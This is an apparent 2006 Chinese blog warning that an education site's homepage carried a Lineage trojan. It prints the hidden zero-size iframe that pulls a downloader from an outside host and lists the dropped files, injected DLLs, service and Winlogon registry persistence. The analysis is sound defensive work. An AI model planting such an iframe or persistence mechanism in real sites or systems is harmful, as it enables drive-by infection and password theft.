Roger at 4:27 pm on 星期三, 十一月 1, 2006
资策会首页(
iiiedu.org.tw...)今天被植入木马(Lineage),到现在为止,都还未被移除,请各位小心啰。
以下是这只木马的行为:
1. 首页被植入iframe
“
http://w.... fxkfxk .com/333/us.asp” width=”0″ height=”0″ scrolling=”no” frameborder=”0″
2. 档案 us.asp 是一个 VBScript,它会下载或执行 us.exe。
3. 执行之后,系统会产生:
[Added process]
C:\WINDOWS\svchost.exe
[DLL Injection]
C:\WINDOWS\svchost.exe 注入某些执行程序,例如, svchost.exe 等等。
C:\WINDOWS\system32\PDLL.dll 注入某些执行程序,例如, svchost.exe、explorer.exe 等等。
C:\WINDOWS\winnt.dll 注入某些执行程序,例如, 浏览器等等。
C:\WINDOWS\winntKey.DLL 注入某些执行程序,例如, svchost.exe 等等。
[Added service]
NAME=PigeonServer
DISPLAY=PigeonServer
FILE=C:\WINDOWS\winnt.exe
[Drop Files]
C:\Program Files\WindowsUpdate\1.exe
C:\Program Files\WindowsUpdate\2.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\PDLL.dll
C:\WINDOWS\winnt.dll
C:\WINDOWS\winnt.exe
C:\WINDOWS\winntKey.DLL
[Added Registries]
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe,
C:\WINDOWS\svchost.exe,
